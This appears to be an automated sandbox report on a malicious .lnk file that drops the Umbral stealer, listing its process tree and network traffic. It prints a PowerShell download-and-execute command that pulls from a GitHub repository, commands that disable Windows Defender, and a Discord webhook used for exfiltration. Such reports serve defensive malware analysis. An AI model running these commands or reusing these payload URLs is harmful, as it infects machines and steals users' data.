Analysis

  • max time kernel
    37s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 14:56 UTC

General

  • Target

    1231321312.lnk

  • Size

    2KB

  • MD5

    a83ed03220cbc79bcbcaae9a57d0b95a

  • SHA1

    062d88505a421b491c8614ccff1d8fdd34453e18

  • SHA256

    c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033

  • SHA512

    97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:6000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4452
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1268
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
            PID:4352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2876
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:1872

    Network

    • flag-us
      DNS
      raw.githubusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      raw.githubusercontent.com
      IN A
      Response
      raw.githubusercontent.com
      IN A
      185.199.110.133
      raw.githubusercontent.com
      IN A
      185.199.108.133
      raw.githubusercontent.com
      IN A
      185.199.111.133
      raw.githubusercontent.com
      IN A
      185.199.109.133
    • flag-us
      GET
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: raw.githubusercontent.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 235
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: text/plain; charset=utf-8
      ETag: "2ffb20924b8165e3bb0d1adeb4c308a05358721c09521f03eb9517e013c63729"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 9BA4:2CF82C:258870:51385F:67E0209A
      Accept-Ranges: bytes
      Date: Sun, 23 Mar 2025 14:56:48 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600093-LCY
      X-Cache: HIT
      X-Cache-Hits: 0
      X-Timer: S1742741809.901862,VS0,VE1
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 9c9648a2f0ae72915cc89930488506e761657acb
      Expires: Sun, 23 Mar 2025 15:01:48 GMT
      Source-Age: 150
    • flag-us
      GET
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /sigmanip/reallogs123fr/refs/heads/main/Umbral.exe HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: raw.githubusercontent.com
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 232448
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: application/octet-stream
      ETag: "3bb1be44a471407bf874d31bb67f7ee3c0cabbbcd1ed58d49011f4e4de216d2d"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 637A:23CF78:2DC55B:635D7F:67E01D79
      Accept-Ranges: bytes
      Date: Sun, 23 Mar 2025 14:56:49 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600093-LCY
      X-Cache: HIT
      X-Cache-Hits: 0
      X-Timer: S1742741810.559584,VS0,VE1
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 0d864f50d8286eea9cffb22ca8bb9dc7a9704aa4
      Expires: Sun, 23 Mar 2025 15:01:49 GMT
      Source-Age: 150
    • flag-us
      DNS
      github.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      20.26.156.215
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
    • flag-gb
      GET
      https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe
      powershell.exe
      Remote address:
      20.26.156.215:443
      Request
      GET /sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: github.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Server: GitHub.com
      Date: Sun, 23 Mar 2025 14:56:49 GMT
      Content-Type: text/html; charset=utf-8
      Content-Length: 0
      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
      Access-Control-Allow-Origin:
      Location: https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      Cache-Control: no-cache
      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
      X-Frame-Options: deny
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 0
      Referrer-Policy: no-referrer-when-downgrade
      Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
      X-GitHub-Request-Id: BDA3:3CE317:6520A7:844034:67E02131
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 33E55781042B494D99A3808D6B7C3977 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F6363355ED994B3BA50A7F35557CB21E Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 2B5505CA640648F98BC3A9990ED96987 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      DNS
      gstatic.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      gstatic.com
      IN A
      Response
      gstatic.com
      IN A
      172.217.16.227
    • flag-gb
      GET
      https://gstatic.com/generate_204
      Umbral.exe
      Remote address:
      172.217.16.227:443
      Request
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Sun, 23 Mar 2025 14:56:52 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 439648
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: CEC2D33B7E064FEA83147BFA364B4571 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 443925
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: E989363938AD43718405CECC9CE0F242 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 440528
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: EDCE895C95F542C6B338DB5C59982ED7 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 561393
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: AE1EC42FA31D44D8B94F7A01F0F2420C Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 629947
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6E1DAB3E6D7F4445B4DE756D98F7F3F6 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 488476
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 19B654A1241941A0A24B5A4C7D3C0780 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:54Z
      date: Sun, 23 Mar 2025 14:56:53 GMT
    • flag-us
      DNS
      ip-api.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/?fields=225545
      Umbral.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 23 Mar 2025 14:56:53 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 191
      Access-Control-Allow-Origin: *
      X-Ttl: 5
      X-Rl: 43
    • flag-us
      DNS
      discord.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      discord.com
      IN A
      Response
      discord.com
      IN A
      162.159.135.232
      discord.com
      IN A
      162.159.128.233
      discord.com
      IN A
      162.159.136.232
      discord.com
      IN A
      162.159.137.232
      discord.com
      IN A
      162.159.138.232
    • flag-us
      POST
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      Umbral.exe
      Remote address:
      162.159.135.232:443
      Request
      POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: application/json; charset=utf-8
      Host: discord.com
      Content-Length: 969
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Sun, 23 Mar 2025 14:56:54 GMT
      Content-Type: application/json
      Content-Length: 45
      Connection: keep-alive
      Cache-Control: public, max-age=3600, s-maxage=3600
      strict-transport-security: max-age=31536000; includeSubDomains; preload
